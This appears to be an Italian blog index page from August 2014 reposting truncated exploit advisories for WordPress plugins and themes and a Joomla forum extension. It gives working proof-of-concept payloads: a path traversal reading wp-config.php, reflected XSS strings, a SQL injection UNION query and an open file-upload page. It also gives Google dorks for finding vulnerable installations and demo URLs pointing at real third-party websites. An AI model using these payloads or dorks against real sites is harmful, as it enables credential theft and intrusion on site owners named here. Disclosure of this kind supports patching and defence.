WordPress KenBurner Slider Arbitrary File Download

26 agosto 2014 - Fonte: http://www.mondounix.com
# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability
# Google Dork: Index of /wp-content/plugins/kbslider
# Date: 2014-08-21
# Exploit Author: MF0x and Daniel Pentest
# Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 
# Version: All
# Tested on: Windows 7 / Google Chrome
 
Description:
The Wordpress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability
 
Proof of Concept (PoC):
http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
 
# Discovered by: MF0x and Daniel Pentest             
 
# Website: http://www.null-source.blogspot.com.br/
# Email: daniel@analistadesistema.net
#...

Leggi il seguito »

WordPress All In One SEO Pack 2.2.2 Cross Site Scripting

20 agosto 2014 - Fonte: http://www.mondounix.com
Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2
 
ABOUT:
 
All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. 
 
NOTE: User must have the ability to publish pages in the affected WordPress site.
 
POC:
 
http://localhost/wordpress/wp-admin/post.php?post_type=page
 
Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0)...

Leggi il seguito »

WordPress MyBand Theme Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress MyBand Theme Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-03
  |
  | [*] Vendor Homepage : http://www.mybandtheme.com
  |
  | [*] Google Dork: inurl:wp-content/themes/myband
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind: XSS Reflected
  |
  | [*] PoC :
  |
  | [*]  [Localhost]/wordpress/wp-content/themes/myband/timthumb.php?src=[XSS]
  |-------------------------------------------------------------------------|
...

Leggi il seguito »

WordPress Gamespeed Theme Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress Gamespeed Theme Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.dalih.net/
# Date: 3/8/2014
# Tested On : Linux , Windows
# Software Link : http://www.dalih.net/wordpress-themes/game-speed/
######################
#  
http://www.centrecatala.cl/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%22%3E%3Cimg%20src=aa%20onerror=prompt%28/xss/%29%3E
#  
http://radiohope.com.ar/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://www.gameactors.com/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://300mbfilms.ir/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
######################
#...

Leggi il seguito »

WordPress SI CAPTCHA Cross Site Scripting

15 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress SI CAPTCHA Anti-Spam Plugin Cross  
site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-02
  |
  | [*] Vendor Homepage : http://wordpress.org
  |
  | [*] Software Link : http://wordpress.org/plugins/si-captcha-for-wordpress/
  |
  | [*] Version : 2.7.4
  |
  | [*] Google Dork:  
inurl:/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind:...

Leggi il seguito »

WordPress GB Gallery Slideshow 1.5 SQL Injection

14 agosto 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress GB Gallery Slideshow 1.5 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://gb-plugins.com/
 
# Software Link : http://downloads.wordpress.org/plugin/gb-gallery-slideshow.1.5.zip
 
# Date : 2014-08-09
 
# Tested on : Linux / sqlmap 1.0-dev-5b2ded0
        Linux / Mozilla Firefox
 
######################
 
# Location :  
http://localhost/wp-content/plugins/gb-gallery-slideshow/GBgallery.php
 
######################
 
# Vulnerable code :
 
    if(isset($_POST['selected_group'])){
        global $gb_post_type, $gb_group_table, $wpdb;
        $my_group_id = $_POST['selected_group'];
    ...

Leggi il seguito »

WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

14 agosto 2014 - Fonte: http://www.mondounix.com
[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-12
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
###...

Leggi il seguito »

WordPress WPSS 0.62 Cross Site Scripting

7 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS v 0.62 Plugin Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*]   
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
...

Leggi il seguito »

WordPress WPSS 0.62 SQL Injection

7 agosto 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS V 0.62 Plugin Sql injection
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozila Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*]   
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
...

Leggi il seguito »

Joomla Kunena Forum 3.0.5 Cross Site Scripting

4 agosto 2014 - Fonte: http://www.mondounix.com
Kunena forum extension for Joomla multiple reflected cross-site scripting vulnerabilities
 
Class:      Input Validation Error
CVE      N/A
Remote      Yes
Local      No
Published    02/07/2014
 
Credit      Raymond Rizk of Dionach (vulns@dionach.com)
Vendor      Kunena
Vulnerable    Kunena v3.0.5
Solution Status:  Fixed by Vendor
 
Kunena Forum is prone to multiple reflected cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information.
 
Kunena...

Leggi il seguito »